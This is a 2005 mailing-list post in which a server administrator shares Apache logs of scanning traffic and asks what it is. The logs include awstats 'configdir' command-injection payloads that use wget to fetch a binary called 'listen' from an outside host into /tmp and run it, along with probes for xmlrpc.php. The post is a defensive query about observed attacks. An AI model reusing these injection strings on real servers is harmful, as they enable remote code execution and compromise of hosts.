Apache scanning for the xmlrpc.php and more
Ćukasz Hejnak <[email protected]> Tue, 22 Nov 2005 23:54:59 +0100
| Newsgroups | gmane.linux.lfs.security |
|---|---|
| Message-ID | <[email protected]> |
Hi Recently I've been getting a bigger then normal amount of port 80=20 designated attacks. What's wondering is that most of these look much=20 alike, like it was some kind of script/program for scanning. Anybody=20 else is getting those? what is it? Below are the logs from apache: 81.208.19.149 - - [22/Nov/2005:22:10:31 +0100] "GET=20 /awstats/awstats.pl?configdir=3D|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%= 2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e= 102%2e212%2e115;echo%20YYY;echo|=20 HTTP/1.1" 404 317 81.208.19.149 - - [22/Nov/2005:22:10:32 +0100] "GET=20 /cgi-bin/awstats.pl?configdir=3D|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%= 2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e= 102%2e212%2e115;echo%20YYY;echo|=20 HTTP/1.1" 404 317 81.208.19.149 - - [22/Nov/2005:22:10:36 +0100] "GET=20 /cgi-bin/awstats/awstats.pl?configdir=3D|echo;echo%20YYY;cd%20%2ftmp%3bwg= et%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%= 20216%2e102%2e212%2e115;echo%20YYY;echo|=20 HTTP/1.1" 404 325 81.208.19.149 - - [22/Nov/2005:22:10:37 +0100] "POST /xmlrpc.php=20 HTTP/1.1" 404 309 81.208.19.149 - - [22/Nov/2005:22:10:39 +0100] "POST /blog/xmlrpc.php=20 HTTP/1.1" 404 314 81.208.19.149 - - [22/Nov/2005:22:10:40 +0100] "POST=20 /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 321 81.208.19.149 - - [22/Nov/2005:22:10:44 +0100] "POST=20 /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 322 81.208.19.149 - - [22/Nov/2005:22:10:48 +0100] "POST /drupal/xmlrpc.php=20 HTTP/1.1" 404 316 81.208.19.149 - - [22/Nov/2005:22:10:50 +0100] "POST=20 /phpgroupware/xmlrpc.php HTTP/1.1" 404 322 81.208.19.149 - - [22/Nov/2005:22:10:54 +0100] "POST=20 /wordpress/xmlrpc.php HTTP/1.1" 404 319 81.208.19.149 - - [22/Nov/2005:22:10:56 +0100] "POST /xmlrpc.php=20 HTTP/1.1" 404 309 81.208.19.149 - - [22/Nov/2005:22:10:57 +0100] "POST /xmlrpc/xmlrpc.php=20 HTTP/1.1" 404 316 What exactly is this for? looking for the xmlrpc.php, is it some file=20 with a known exploit to it or such? and furthermore, this here: /awstats/awstats.pl?configdir=3D|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%= 2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e= 102%2e212%2e115;echo%20YYY;echo|=20 /cgi-bin/awstats.pl?configdir=3D|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%= 2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e= 102%2e212%2e115;echo%20YYY;echo|=20 =20 /cgi-bin/awstats/awstats.pl?configdir=3D|echo;echo%20YYY;cd%20%2ftmp%3bwg= et%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%= 20216%2e102%2e212%2e115;echo%20YYY;echo|=20 this is as far as I can understand, a vulnerability that allows one to=20 execute shell commands with the privileges of the apache user, nice.. -- Best wishes =A3ukasz Hejnak --=20 http://linuxfromscratch.org/mailman/listinfo/lfs-security FAQ: http://www.linuxfromscratch.org/faq/ Unsubscribe: See the above information page